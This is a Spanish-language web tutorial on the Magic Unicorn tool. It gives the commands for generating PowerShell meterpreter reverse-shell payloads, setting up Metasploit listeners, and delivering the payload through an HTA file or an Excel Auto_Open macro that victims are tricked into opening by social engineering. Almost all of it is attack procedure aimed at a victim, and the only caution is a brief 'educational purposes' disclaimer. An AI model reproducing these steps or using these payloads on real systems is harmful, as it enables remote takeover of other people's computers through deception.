https://esgeeks.com/?p=5311

Magic Unicorn es una herramienta simple para usar un ataque downgrade de PowerShell que inyecta shellcode directamente en la memoria. Se basa en los ataques de powershell de Matthew Graeber y en la técnica de bypass de PowerShell presentada por David Kennedy (TrustedSec) y Josh Kelly en Defcon 18.

¡Cuidado!

La siguiente información es con fines educativos. No me hago responsable del daño que pueda causar.

1. Instalar Unicorn (Magic Unicorn)

Descarga la herramienta Unicorn desde el repositorio git:

git clone https://github.com/trustedsec/unicorn.git
Instalar Magic Unicorn desde Github

Instalar Magic Unicorn desde Github

Una vez descargado, ve al directorio y ejecuta unicorn con el siguiente comando para ver todos los métodos posibles.

cd unicorn/
./unicorn.py
Ejecutar unicorn

Ejecutar unicorn

2. Realizar ataque de PowerShell

Primero probaremos la payload reverse_tcp. Como podemos ver en el menú principal todos los comandos ya están escritos. Solo necesitamos reemplazar la IP con nuestra IP.

python unicorn.py windows/meterpreter/reverse_tcp [tu_IP] 4444
Payload reverse_tcp para PowerShell

Payload reverse_tcp para PowerShell

Ahora esto nos dará dos archivos. Uno es un archivo de texto llamado “powershell_attack.txt” que tiene el código de powershell que se ejecutará en la máquina de la víctima utilizando ingeniería social y el otro es “unicorn.rc“, que es un archivo metasploit personalizado que establecerá automáticamente todos los parámetros e iniciará un oyente.

Estos archivos se guardarán en el directorio donde se clonó unicorn.

Nota 1!

powershell_attack.txt contiene el código malicioso y cuando la víctima ejecute ese código en su línea de comandos, el atacante obtendrá una conexión inversa de su máquina.


Ahora vamos a configurar un oyente. Necesitamos ejecutar el archivo metasploit “unicorn.rc” usando el siguiente comando (desde la carpeta unicorn):

msfconsole -r unicorn.rc
Conexión inversa con msfconsole para PowerShell

Conexión inversa con msfconsole para PowerShell

Vemos que se obtuvo una sesión en el meterpreter. Fue porque el código de powershell se ejecutó en el shell de comando de la víctima. Habría parecido algo así:

Ejecución de shell ataque en Windows

Ejecución de shell ataque en Windows

3. Realizar un ataque HTA

Para nuestro próximo ataque, usaremos una payload hta.

python unicorn.py windows/meterpreter/reverse_https [tu_IP] 4455 hta
Ataque HTA con unicorn

Ataque HTA con unicorn

Ahora envía los archivos que se crearán a la víctima y luego espera a que el usuario haga clic en el archivo “launcher.hta” que se puede hacer usando fácilmente la ingeniería social.


Por lo tanto, configuramos un detector de metasploit a continuación utilizando el archivo RC y esperamos que el usuario haga clic en la carga útil de hta.

cd hta_attack/
msfconsole -r unicorn.rc

Tan pronto como la víctima ejecute el archivo, recibimos una sesión de meterpreter. Verificamos la información del sistema usando el comando sysinfo:

Sesión de meterpreter con Unicorn y hta

Sesión de meterpreter con Unicorn y hta

4. Realizar ataque en Macro de Excel

Ahora, para la tercera y última carga útil o payload de este tutorial, ponemos las manos en nuestras amadas Macros.

python unicorn.py windows/meterpreter/reverse_https [tu_IP] 443 macro
Ataque en Macro de Excel

Ataque en Macro de Excel

Esto crea de nuevo un archivo de texto y un archivo “.rc” con el mismo nombre y en el mismo destino.

Ataque macro con unicorn

Ataque macro con unicorn

Para habilitar el modo Programador hay varios métodos dependiendo de tu versión de MS Office.

  • En cuanto a un enfoque genérico, digamos que lo habilitaste así: Archivo-> Opciones-> Personalizar Cintas de opciones-> Programador
Habilitar el modo Programador en Excel

Habilitar el modo Programador en Excel

Nota 2!

Verás una pestaña adicional etiquetada como Programador una vez que se habilite.
  • En cuanto al ataque, vae a Programador-> Macros y crea una nueva macro llamada “Auto_Open
Macro llamada Auto_Open

Macro llamada Auto_Open

  • Simplemente pega el contenido de “powershell_attack.txt” en este módulo xlsx y guárdalo.
powershell_attack en Macro de Excel

powershell_attack en Macro de Excel

  • ¡Tan pronto como la víctima haga clic en Ejecutar (pequeño ícono verde en la parte superior), le dará un error! No te preocupes por ese error. Se supone que pasa.
Microsoft Office Error code -219

Microsoft Office Error code -219

¡Poco después del error en la pantalla de usuario, habríamos obtenido una sesión exitosa en meterpreter!

msfconsole -r unicorn.rc
Ejecutar unicorn.rc

Ejecutar unicorn.rc

¡Utiliza sysinfo para comprobar la explotación exitosa usando unicorn!

Exploit exitoso usando unicorn

Exploit exitoso usando unicorn

¡Si te ha sido interesante este artículo, por favor compártelo en tus redes sociales! Nos vemos pronto :’)


¡Mantente actualizado!

Suscríbete a nuestro boletín semanal...

Suscríbete a nuestro boletín electrónico para recibir artículos útiles y ofertas especiales. No te perderás absolutamente de nada!

Enviaremos solamente boletines al email y no compartiremos tu email.